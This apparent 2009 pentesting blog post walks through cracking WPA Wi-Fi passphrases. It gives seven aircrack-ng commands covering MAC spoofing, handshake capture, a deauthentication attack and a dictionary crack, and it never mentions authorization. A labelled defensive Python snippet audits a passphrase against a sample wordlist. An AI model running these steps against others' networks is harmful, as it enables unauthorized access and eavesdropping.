Posted on 09-05-2009
Filed Under (linux, pentesting, wireless) by admin

I’ve been meaning to do a tutorial on cracking WPA wireless for quite a while, but I found this video that explains the methodology really simply. Let me say that cracking WPA is not like cracking WEP: with WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but with WPA the only weakness is the strength of the user’s passphrase. Yes, you’ve guessed it: when cracking WPA what you’re basically doing is brute-forcing the user’s passphrase against the captured handshake, in other words the success of the attack depends entirely on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never recover the WPA key. There are several types of WPA dictionary lists out there, but I highly recommend using precomputed (rainbow-style) tables, which can be several gigabytes in size; keep in mind that the WPA key is derived from both the passphrase and the network’s SSID, so a precomputed table only works for the SSIDs it was built for. How to find them? Google is your friend!

Steps:
1- airmon-ng stop wlan0
2- ifconfig wlan0 down
3- macchanger --mac 00:11:22:33:44:55 wlan0
4- airmon-ng start wlan0
5- airodump-ng -c <channel> -w <filename> --bssid <bssid> wlan0
6- aireplay-ng -0 5 -a <bssid> wlan0
7- aircrack-ng <filename>.cap -w /path/to/dictionary
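
To make the two points above concrete from the defender's side (the attack succeeds only if the passphrase is in the wordlist, and the derived key is salted with the SSID so precomputed tables are SSID-bound), here is an added passphrase-audit example. It is not part of the original post or of the aircrack-ng suite; it derives the WPA/WPA2-Personal pairwise master key with the standard PBKDF2-HMAC-SHA1 construction from IEEE 802.11i and checks a candidate passphrase against a small wordlist that is constructed inline for the example. The function names and the sample wordlist are assumptions of this example.

```python
import hashlib
import math

# Constructed sample wordlist standing in for a real dictionary file.
SAMPLE_WORDLIST = ["password", "12345678", "letmein1", "sunshine", "dragon99"]


def derive_pmk(ssid: str, passphrase: str) -> bytes:
    """WPA/WPA2-Personal PMK per IEEE 802.11i:
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32-byte output).
    The SSID acts as the salt, which is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def in_wordlist(passphrase: str, wordlist) -> bool:
    """True if the passphrase is an exact entry of the wordlist, i.e. a
    dictionary attack with this list would recover it."""
    return passphrase in set(wordlist)


def estimate_entropy_bits(passphrase: str) -> float:
    """Crude charset-based strength estimate: length * log2(charset size).
    Good enough to flag short, single-class passphrases."""
    charset = 0
    if any(c.islower() for c in passphrase):
        charset += 26
    if any(c.isupper() for c in passphrase):
        charset += 26
    if any(c.isdigit() for c in passphrase):
        charset += 10
    if any(not c.isalnum() for c in passphrase):
        charset += 33
    return len(passphrase) * math.log2(charset) if charset else 0.0


def audit_passphrase(ssid: str, passphrase: str, wordlist) -> dict:
    """Audit a WPA-Personal passphrase for the given SSID.
    WPA passphrases must be 8 to 63 printable ASCII characters."""
    return {
        "length_ok": 8 <= len(passphrase) <= 63,
        "in_wordlist": in_wordlist(passphrase, wordlist),
        "entropy_bits": round(estimate_entropy_bits(passphrase), 1),
        "pmk_hex": derive_pmk(ssid, passphrase).hex(),
    }


if __name__ == "__main__":
    # Weak: appears in the sample list, so a dictionary attack would find it.
    print(audit_passphrase("IEEE", "password", SAMPLE_WORDLIST))
    # Same passphrase, different SSID: different PMK, so a table built for
    # "IEEE" is useless against a network called "HomeNet".
    print(derive_pmk("IEEE", "password").hex())
    print(derive_pmk("HomeNet", "password").hex())
```

Running the audit on your own network's SSID and passphrase against a public wordlist is the check that matters: if `in_wordlist` comes back true, the key will fall to exactly the procedure described in this post, regardless of how the rest of the network is configured.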

Video:


Comments

vi on 14 May, 2009 at 4:43 pm #

You’re right, this one does explain it very simply.
Nice work!


admin on 14 May, 2009 at 4:46 pm #

Thanks